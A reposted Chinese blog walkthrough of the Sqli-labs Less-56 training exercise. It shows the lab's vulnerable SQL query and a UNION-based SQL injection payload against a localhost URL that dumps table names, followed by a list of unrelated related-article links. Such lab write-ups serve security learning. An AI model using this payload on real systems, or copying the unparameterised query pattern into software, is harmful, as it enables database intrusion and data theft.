博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Sqli-labs less 56
阅读量:6611 次
发布时间:2019-06-24

本文共 323 字,大约阅读时间需要 1 分钟。

Less-56

与less54.55形式是一致的,我们关注sql语句,

$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

因此给出示例payload

http://127.0.0.1/sqli-labs/Less-56/index.php?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

转载于:https://www.cnblogs.com/lcamry/p/5762658.html

你可能感兴趣的文章
EXCEL记录
查看>>
RH253读书笔记(9)-Lab 9 Account Management Methods
查看>>
Fiddler手机抓包
查看>>
基本类型方法
查看>>
第三阶段小结
查看>>
1022: [SHOI2008]小约翰的游戏John
查看>>
QTP的那些事---webtable的重要使用方法总结
查看>>
easyui重要使用参考文档说明(转)
查看>>
TensorFlow-谷歌深度学习库 手把手教你如何使用谷歌深度学习云平台
查看>>
程序局部性原理的一些思考
查看>>
JavaScript作用域和作用域链
查看>>
[]ARC098
查看>>
JAVA第四次实验
查看>>
IAR 配置
查看>>
for / forEach / for in /for of 的区别及优势
查看>>
【论文学习】A Study of Equivalent and Stubborn Mutation Operators using Human Analysis of Equivalence...
查看>>
如何将自己写的verilog模块封装成IP核
查看>>
python3 urllib.request 网络请求操作
查看>>
Entity Framework with MySQL 学习笔记一(乐观并发)
查看>>
关于js中的date处理
查看>>